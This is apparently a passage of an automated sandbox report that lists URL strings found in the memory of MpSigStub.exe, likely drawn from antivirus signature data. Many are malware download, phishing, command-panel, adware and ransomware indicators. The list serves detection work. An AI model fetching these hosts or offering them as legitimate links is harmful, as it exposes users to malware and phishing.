Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://Motobit.cz
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Viewpics.DYNU.com/views.php?dir=pics&section=hot&clip=14
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://YOURSITE.com/bot.exea
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/interFace/ActiveSeed.aspx
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/interface/SeedInstall.aspx
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/wevoo/data.dat
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/wevoo/data/data
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/wevoo/lists/200
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://a-search.biz/&
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomf.cat/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomf.cat/zjiqnx.html
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomfe.co/hnwila.xml
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://a.up-00.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://a0571310.xsph.ru/djfklvk/revert.php
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://aa.llsging.com/ww/new05.htm?075width=1name=
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: http://aaacollectionsjewelry.com/x9djsa
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://aancyber77.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://aapache.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://aartemis.com/?type=sc&ts=
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://abeidaman.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://abidjanlit.com/loyiruef/invoice/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://abitando.net/outstanding-invoices/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://abluefantasies.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://about:blankhao.360.cn
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://abraandthong.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://academiamylife.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://acayipbiri.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://acceso.masminutos.com
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://accordlifespec.com/gtt.exe
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://acetica.online/presently/refuge/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://acglgoa.com/faq.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://acipatobo01.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://actionforfiletransferthroughcloudbusinessinternationalglobalsys.ydns.eu/business/business.doc
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://activedating.net
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://actresswallpaperbollywood.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://acutelogisticsltd.com/wp-content/themes/acutelogisticsltd/js/ie-emulation-modes-warning.js
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://ad.eltext.com
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://ad.tuzikmedia.biz
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://addictedtobash.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://adobe-mark.byethost3.com/adobe-mail/pdf.php)
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://ads.8866.org/
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads.cgi?
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?x_dp_id=
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://ads4.think-adz.com/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://ads4.think-adz.com/xD
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://adult-xxx-sex-porn-playboy.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://advancedcleaner.com
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://advgoogle.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://adyingtiger.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://aerytyre.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://aescripts.com
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://afkar.today/test_coming.training/w_f/
Source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp	String found in binary or memory: http://ag.ru
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://agent.wizztrakys.com/csdi/wizzmonetize/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://agnoted.com/gen/z/virupload.html)
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://agressor58.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://ahmad-roni.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://aindonashi.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://ainsleywirefly.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://aircel3ghack.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://airsquirrels.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://aitimatafb.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	String found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://ajustek.com.br/pt-br/clicks.php?
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://akdoganevdeneve.net/wp-content/Panel/gate.php
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://akrilikkapak.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://akusajaboys.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://alaihomestay.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://albaniaspace.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	String found in binary or memory: http://alert-ca.com/counter1/fout.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://alexandrea-friesen16ka.ru.com/rocket.html
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://alfaportal.com/c
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://alhalm-now.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://alindaenua.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://aliyun.one
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://all-best-facts.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://allabouttopten.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://allankhall.com/templates/beez3/language/en-gb/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://allcomics4free.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://allinfree.net.info/youtube.xpi
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://allinfree.net/chrome.xml
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://allsexyinbox.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://allwallpaper3d.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://almasto.net/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://altaredlife.com/images/gp8/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://altavista.com/favicon.ico
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://amazing-cars.org
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://ameganfoxhairstyle.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://americanexpress-secure.com
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://aminxfreedownload.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://amiral.ga/wp-content/cUFTze5/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://ammun-ra.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://amr16pzcp03omerd.xyz/summer.gif
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://anazhthseis.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://andanar.myjino.ru/black/pdfaluko/pdf/pdf/login.htm)
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://andrew08.testar.testforhost.com/ksinamisev.exe/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://andromulator.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://andsihowdint.ru/april/get.php?id=
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://anhchebongda.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://anherbal.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://animefrase.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://ankarahurdacim.com/wp-admin/3yk1/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://anmolboutique.com/osu/mgs/es/)
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://anomaniez.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://anonfile.xyz
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://antispysolutions.com/?aid=
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://antivirus-x.com/in.cgi?20
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://anty.freehostia.com/xxx/d
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://anty.freehostia.com/xxx/d5SOFTWARE
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://aolopdephn.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://ap.gamezi.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://apee296.co.ke/tatiyv6824540/gescanntes-dokument/zahlungserinnerung
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	String found in binary or memory: http://api.aldtop.com
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://api.getwebcake.com/getwebcake/gc1
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://apivones.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://apk.downloadatoz.com/package/com.allinone.free.apk
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://apkfull2016.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://apofraxisavlonitis.gr/usswz/
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://app.fileman.co.kr/app/Fileman.exe
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://app.fileman.co.kr/app/ver.ini
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://app.whenu.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://apps.bittorrent.com/cl_search/x6
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://apps.tangotoolbar.com
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://appstub.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://appswonder.info
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://appustories.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://apupdates-westeurope.cloudapp.net/Update/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://araazman.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://arab-garden.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://aradiklarinburada.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://archiv.kl.com.ua/mssc.exe
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://arianarosefull.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://arifkacip.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://aristocrat.furniture/wp-content/themes/oceanwp/woocommerce/car
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://arizonaic.com
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://arpp0934.iespana.es
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://arthisoft.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://articlunik.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://artishollywoodbikini.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://asiafoodlog.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://asianhotxxx.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://asilsizhaber.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://aspeja.org/question/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://aspx.qqus.net/wanmei/login.asp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://aspx.vod38.com/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://assistant.3721.com/help/uninstcns.htm
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://assistant.3721.com/instok
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://asuguglejancok.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://athasoftonlinestore.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://ati.vn
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://attcarsint.cf/better/)
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://australia-505.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://autism-doctor.com.ua/openbizz.html)
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://auto.livesearchpro.com/response
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://auto.search.
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://autonamlong.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://autothich.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://avcute.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://averyfunnypage.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://avisocliente31.altervista.org/hotmail-atualizacao32
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://avnisevinc.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://avnpage.info/final3.php
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://avnpage.info/video/prenium.xpi
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://avnpage.info/watch/prenium.crx
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://avocat360.fr/7-past-due-invoices/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://ayanojou.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://b-compu.de/templates/conext/html/com_contact/contact/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://b.reich.io/
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://b.wehelptoyou.com
Source: MpSigStub.exe, 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp	String found in binary or memory: http://ba3a.biz
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://babelfish.altavista.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bachduongshops.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bahaiat.net/vm/dropbox/)
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://bai2.tlbxsj.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://balaiomaranhao.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://balochirap.com/wp-content/pdf/payment_advice_pdf.php?email=
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://banatara.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://banatte.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://bangash-free-soft.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://bani-pe-net-cum-sa-faci-bani.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18294785233.00000138AA777000.00000004.00000001.sdmp	String found in binary or memory: http://bannercpm.com/bc
